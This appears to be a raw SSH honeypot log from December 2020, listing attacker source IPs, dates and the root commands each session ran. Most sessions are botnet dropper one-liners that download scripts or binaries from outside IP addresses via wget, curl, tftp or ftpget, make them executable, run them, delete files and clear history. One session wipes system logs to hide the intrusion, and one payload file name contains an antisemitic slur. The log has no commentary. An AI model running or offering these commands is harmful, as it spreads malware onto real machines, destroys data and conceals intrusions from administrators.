0day.autoroot wget 46.249.32.140/bins/Gummy.arm5 curl -O 46.249.32.140/bins/Gummy.arm5 chmod 777 Gummy.arm5 ./Gummy.arm5 0day.autoroot wget 46.249.32.140/bins/Gummy.arm6 curl -O 46.249.32.140/bins/Gummy.arm6 chmod 777 Gummy.arm6 ./Gummy.arm6 0day.autoroot wget 46.249.32.140/bins/Gummy.arm7 curl -O 46.249.32.140/bins/Gummy.arm7 chmod 777 Gummy.arm7 ./Gummy.arm7 0day.autoroot wget 46.249.32.140/bins/ curl -O 46.249.32.140/bins/ chmod 777 ./ 0day.autoroot wget 46.249.32.140/bins/ curl -O 46.249.32.140/bins/ chmod 777 ./ 0day.autoroot From 35.204.166.214 7-Dec-2020 16:13:01 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.210.170.111/bins.sh; curl -O http://192.210.170.111/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 192.210.170.111 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r bins2.sh -g 192.210.170.111; chmod 777 bins2.sh; sh bins2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.210.170.111 bins1.sh bins1.sh; sh bins1.sh; rm -rf bins.sh bins.sh bins2.sh bins1.sh; rm -rf * ; wget 119.147.213.57/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 119.147.213.57/bot.pl ; perl bot.pl ; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://192.210.170.111/bins.sh curl -O http://192.210.170.111/bins.sh chmod 777 bins.sh sh bins.sh tftp 192.210.170.111 -c get bins.sh chmod 777 bins.sh sh bins.sh tftp -r bins2.sh -g 192.210.170.111 chmod 777 bins2.sh sh bins2.sh ftpget -v -u anonymous -p anonymous -P 21 192.210.170.111 bins1.sh bins1.sh sh bins1.sh rm -rf bins.sh bins.sh bins2.sh bins1.sh rm -rf * wget 119.147.213.57/bot.pl perl bot.pl rm -rf bot.pl curl -O 119.147.213.57/bot.pl perl bot.pl history -c From 159.89.14.213 9-Dec-2020 02:23:33 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://172.245.36.161/sh; curl -O http://172.245.36.161/sh; chmod 777 sh; sh sh; tftp 172.245.36.161 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 172.245.36.161; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 172.245.36.161 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://172.245.36.161/sh curl -O http://172.245.36.161/sh chmod 777 sh sh sh tftp 172.245.36.161 -c get bins.sh chmod 777 bins.sh sh bins.sh tftp -r .sh -g 172.245.36.161 chmod 777 .sh sh .sh ftpget -v -u anonymous -p anonymous -P 21 172.245.36.161 .sh .sh sh .sh rm -rf sh bins.sh .sh .sh rm -rf * From 107.173.181.20 9-Dec-2020 07:56:16 ssh2 root Exec cd /tmp; wget http://192.3.251.67/bins/Ares.x86; chmod 777 *; ./Ares.x86 roots; rm -rf * ; history -c cd /tmp wget http://192.3.251.67/bins/Ares.x86 chmod 777 * ./Ares.x86 roots rm -rf * history -c From 157.230.119.220 10-Dec-2020 09:03:04 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://172.245.36.161/onionbins.sh; chmod 777 onionbins.sh; sh onionbins.sh; tftp 172.245.36.161 -c get oniontftp1.sh; chmod 777 oniontftp1.sh; sh oniontftp1.sh; tftp -r oniontftp2.sh -g 172.245.36.161; chmod 777 oniontftp2.sh; sh oniontftp2.sh; rm -rf onionbins.sh oniontftp1.sh oniontftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://172.245.36.161/onionbins.sh chmod 777 onionbins.sh sh onionbins.sh tftp 172.245.36.161 -c get oniontftp1.sh chmod 777 oniontftp1.sh sh oniontftp1.sh tftp -r oniontftp2.sh -g 172.245.36.161 chmod 777 oniontftp2.sh sh oniontftp2.sh rm -rf onionbins.sh oniontftp1.sh oniontftp2.sh rm -rf * From 45.148.10.28 13-Dec-2020 05:17:34 ssh2 root Exec cat /etc/issue; pkill fri; pkill xmrig; pkill xmrigMiner; pkill cnrig; cat /etc/issue pkill fri pkill xmrig pkill xmrigMiner pkill cnrig From 157.230.109.54 13-Dec-2020 17:38:45 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.116.179.1/ghoul.sh; chmod 777 ghoul.sh; sh ghoul.sh; tftp 51.116.179.1 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 51.116.179.1; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 51.116.179.1 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf ghoul.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://51.116.179.1/ghoul.sh chmod 777 ghoul.sh sh ghoul.sh tftp 51.116.179.1 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 51.116.179.1 chmod 777 tftp2.sh sh tftp2.sh ftpget -v -u anonymous -p anonymous -P 21 51.116.179.1 ftp1.sh ftp1.sh sh ftp1.sh rm -rf ghoul.sh tftp1.sh tftp2.sh ftp1.sh rm -rf * From 171.25.193.25 13-Dec-2020 17:47:40 ssh2 root Exec ping 8.8.8.8 ping 8.8.8.8 Exec ping 8.8.8.8 ping 8.8.8.8 From 95.111.253.158 13-Dec-2020 18:12:28 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://91.212.150.241 /Corona.sh; curl -O http://91.212.150.241 /Corona.sh; chmod 777 Corona.sh; sh Corona.sh; tftp 91.212.150.241 -c get Corona2.sh; chmod 777 Corona2.sh; sh Corona2.sh; tftp -r Corona3.sh -g 91.212.150.241 ; chmod 777 Corona3.sh; sh Corona3.sh; ftpget -v -u anonymous -p anonymous -P 21 91.212.150.241 Corona4.sh Corona4.sh; sh Corona4.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://91.212.150.241 /Corona.sh curl -O http://91.212.150.241 /Corona.sh chmod 777 Corona.sh sh Corona.sh tftp 91.212.150.241 -c get Corona2.sh chmod 777 Corona2.sh sh Corona2.sh tftp -r Corona3.sh -g 91.212.150.241 chmod 777 Corona3.sh sh Corona3.sh ftpget -v -u anonymous -p anonymous -P 21 91.212.150.241 Corona4.sh Corona4.sh sh Corona4.sh rm -rf * From 207.154.207.48 14-Dec-2020 11:02:50 ssh2 root Exec uname -a uname -a Exec uname -a uname -a From 35.230.158.225 14-Dec-2020 20:12:27 ssh2 root Exec cat /etc/issue ; wget http://37.46.150.20/bins/Astra.x32; chmod 777 Astra.x32; ./Astra.x32 roots ; rm -rf Astra* ; history -c ; wget 119.147.213.57/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 119.147.213.57/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl cat /etc/issue wget http://37.46.150.20/bins/Astra.x32 chmod 777 Astra.x32 ./Astra.x32 roots rm -rf Astra* history -c wget 119.147.213.57/bot.pl perl bot.pl rm -rf bot.pl curl -O 119.147.213.57/bot.pl perl bot.pl history -c rm -rf bot.pl From 94.6.36.26 15-Dec-2020 23:35:19 ssh2 root w ls -laF From 188.166.8.81 16-Dec-2020 11:59:09 ssh2 root Exec rm -rf Astra.x86*; wget http://193.109.217.15/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.x86 rm -rf Astra.x86* wget http://193.109.217.15/bins/Astra.x86 chmod 777 Astra.x86 ./Astra.x86 roots rm -rf Astra.x86 From 157.230.116.133 17-Dec-2020 00:23:55 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.14.224.103/awoo.sh; curl -O http://45.14.224.103/awoo.sh; chmod 777 awoo.sh; sh awoo.sh; tftp 45.14.224.103 -c get awoo.sh; chmod 777 awoo.sh; sh awoo.sh; tftp -r awoo2.sh -g 45.14.224.103; chmod 777 awoo2.sh; sh awoo2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.14.224.103 awoo1.sh awoo1.sh; sh awoo1.sh; rm -rf awoo.sh awoo.sh awoo2.sh awoo1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.14.224.103/awoo.sh curl -O http://45.14.224.103/awoo.sh chmod 777 awoo.sh sh awoo.sh tftp 45.14.224.103 -c get awoo.sh chmod 777 awoo.sh sh awoo.sh tftp -r awoo2.sh -g 45.14.224.103 chmod 777 awoo2.sh sh awoo2.sh ftpget -v -u anonymous -p anonymous -P 21 45.14.224.103 awoo1.sh awoo1.sh sh awoo1.sh rm -rf awoo.sh awoo.sh awoo2.sh awoo1.sh rm -rf * From 167.99.36.178 17-Dec-2020 03:19:52 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.116.179.1/sh; curl -O http://51.116.179.1/sh; chmod 777 sh; sh sh; tftp 51.116.179.1 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 51.116.179.1; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 51.116.179.1 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://51.116.179.1/sh curl -O http://51.116.179.1/sh chmod 777 sh sh sh tftp 51.116.179.1 -c get bins.sh chmod 777 bins.sh sh bins.sh tftp -r .sh -g 51.116.179.1 chmod 777 .sh sh .sh ftpget -v -u anonymous -p anonymous -P 21 51.116.179.1 .sh .sh sh .sh rm -rf sh bins.sh .sh .sh rm -rf * From 89.249.73.139 18-Dec-2020 22:28:37 ssh2 root cd /root ls -a cd .ssh ls cat test.pl netstat -n unset HISTFILE rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog unset HISTFILE unset HISTSAVE unset HISTLOG history -n unset WATCH export HISTFILE=/dev/null export HISTFILE=/dev/null unset HISTFILE rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog unset HISTFILE unset HISTSAVE unset HISTLOG history -n unset WATCH export HISTFILE=/dev/null export HISTFILE=/dev/null w wget cat /etc/issue cat /etc/issue wget 185.162.235.164/muh.tgz scp From 94.6.36.26 19-Dec-2020 15:39:21 ssh2 root w ls -laF cat /etc/issue nproc lscpu wget hell.fr.to/all/prv.tgz curl -O hell.fr.to/all/prv.tgz yum install curl apt-get install curl crl -O hell.fr.to/all/prv.tgz reboot kill -9 -1 From 51.89.107.21 20-Dec-2020 01:15:54 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.221.237.112/GhOul.sh; chmod 777 GhOul.sh; sh GhOul.sh; tftp 185.221.237.112 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.221.237.112; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.221.237.112 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://185.221.237.112/GhOul.sh chmod 777 GhOul.sh sh GhOul.sh tftp 185.221.237.112 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 185.221.237.112 chmod 777 tftp2.sh sh tftp2.sh ftpget -v -u anonymous -p anonymous -P 21 185.221.237.112 ftp1.sh ftp1.sh sh ftp1.sh rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh rm -rf * From 51.178.215.251 20-Dec-2020 20:30:24 ssh2 root Exec wget http://37.46.150.184/we.sh; curl -O http://37.46.150.184/we.sh; chmod 777 we.sh; sh we.sh wget http://37.46.150.184/we.sh curl -O http://37.46.150.184/we.sh chmod 777 we.sh sh we.sh From 45.148.10.54 21-Dec-2020 09:11:10 ssh2 root Exec history history From 165.22.30.228 21-Dec-2020 09:43:28 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.188/Fourloko.sh; chmod 777 *; sh Fourloko.sh; tftp -g 185.10.68.188 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://185.10.68.188/Fourloko.sh chmod 777 * sh Fourloko.sh tftp -g 185.10.68.188 -r tftp1.sh chmod 777 * sh tftp1.sh rm -rf *.sh history -c From 167.71.76.221 21-Dec-2020 20:32:08 ssh2 root Exec rm -rf Astra.x86*; wget http://37.46.150.160/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.x86 rm -rf Astra.x86* wget http://37.46.150.160/bins/Astra.x86 chmod 777 Astra.x86 ./Astra.x86 roots rm -rf Astra.x86 From 34.126.126.246 23-Dec-2020 05:28:58 ssh2 root Exec cat /etc/issue ; cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://85.204.116.33/networkrip.sh; chmod 777 networkrip.sh; sh networkrip.sh; tftp 85.204.116.33 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 85.204.116.33; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf * cat /etc/issue cd /tmp cd /var/run cd /mnt cd /root cd / wget http://85.204.116.33/networkrip.sh chmod 777 networkrip.sh sh networkrip.sh tftp 85.204.116.33 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 85.204.116.33 chmod 777 tftp2.sh sh tftp2.sh rm -rf * From 185.117.119.235 23-Dec-2020 07:15:12 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.98.61.43/bdExploit/exploit.x86_64; curl -O http://198.98.61.43/bdExploit/exploit.x86_64; cat exploit.x86_64 > 0x3a13a141f0c; chmod +x *; ./0x3a13a141f0c Exploit.x86.BadWolf; wget http://198.98.61.43/bdExploit/exploit.x86; curl -O http://198.98.61.43/bdExploit/exploit.x86_64; cat exploit.x86 > 0x3a13a141f0; chmod +x *; ./0x3a13a141f0 Exploit.x86.BadWolf cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://198.98.61.43/bdExploit/exploit.x86_64 curl -O http://198.98.61.43/bdExploit/exploit.x86_64 cat exploit.x86_64 > 0x3a13a141f0c chmod +x * ./0x3a13a141f0c Exploit.x86.BadWolf wget http://198.98.61.43/bdExploit/exploit.x86 curl -O http://198.98.61.43/bdExploit/exploit.x86_64 cat exploit.x86 > 0x3a13a141f0 chmod +x * ./0x3a13a141f0 Exploit.x86.BadWolf From 35.226.178.145 23-Dec-2020 14:58:45 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget http://85.204.116.33/networkrip.sh; chmod 777 networkrip.sh; sh networkrip.sh; tftp 85.204.116.33 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 85.204.116.33; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf * cat /etc/issue cd /tmp wget http://85.204.116.33/networkrip.sh chmod 777 networkrip.sh sh networkrip.sh tftp 85.204.116.33 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 85.204.116.33 chmod 777 tftp2.sh sh tftp2.sh rm -rf * From 64.225.51.64 23-Dec-2020 15:23:44 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.140.242.38/sh; curl -O http://104.140.242.38/sh; chmod 777 sh; sh sh; tftp 104.140.242.38 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 104.140.242.38; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 104.140.242.38 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *6 cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://104.140.242.38/sh curl -O http://104.140.242.38/sh chmod 777 sh sh sh tftp 104.140.242.38 -c get bins.sh chmod 777 bins.sh sh bins.sh tftp -r .sh -g 104.140.242.38 chmod 777 .sh sh .sh ftpget -v -u anonymous -p anonymous -P 21 104.140.242.38 .sh .sh sh .sh rm -rf sh bins.sh .sh .sh rm -rf *6 From 143.110.175.100 26-Dec-2020 01:41:42 ssh2 root Exec id id From 46.101.18.129 27-Dec-2020 13:02:55 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://20.52.139.70/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 20.52.139.70 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 20.52.139.70; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://20.52.139.70/fuckjewishpeople.sh chmod 777 fuckjewishpeople.sh sh fuckjewishpeople.sh tftp 20.52.139.70 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 20.52.139.70 chmod 777 tftp2.sh sh tftp2.sh rm -rf * From 185.117.119.189 27-Dec-2020 16:26:38 ssh2 root Exec cd /tmp || cd /; wget -q http://198.251.81.249/cometome; cat cometome > vegaiscoming; chmod +x vegaiscoming; ./vegaiscoming cd /tmp || cd / wget -q http://198.251.81.249/cometome cat cometome > vegaiscoming chmod +x vegaiscoming ./vegaiscoming From 165.227.170.187 28-Dec-2020 14:56:02 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.14.224.103/GoOgle.sh; chmod 777 GoOgle.sh; sh GoOgle.sh; tftp 45.14.224.103 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.14.224.103; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.14.224.103 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf GoOgle.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.14.224.103/GoOgle.sh chmod 777 GoOgle.sh sh GoOgle.sh tftp 45.14.224.103 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 45.14.224.103 chmod 777 tftp2.sh sh tftp2.sh ftpget -v -u anonymous -p anonymous -P 21 45.14.224.103 ftp1.sh ftp1.sh sh ftp1.sh rm -rf GoOgle.sh tftp1.sh tftp2.sh ftp1.sh rm -rf * From 51.116.180.98 29-Dec-2020 21:47:35 ssh2 root Exec uname -a && lscpu uname -a lscpu From 192.227.134.70 31-Dec-2020 16:38:39 ssh2 root Exec cd /tmp || cd /; wget -q http://37.46.150.184/cometome; cat cometome > vegaiscoming; chmod +x vegaiscoming; ./vegaiscoming cd /tmp || cd / wget -q http://37.46.150.184/cometome cat cometome > vegaiscoming chmod +x vegaiscoming ./vegaiscoming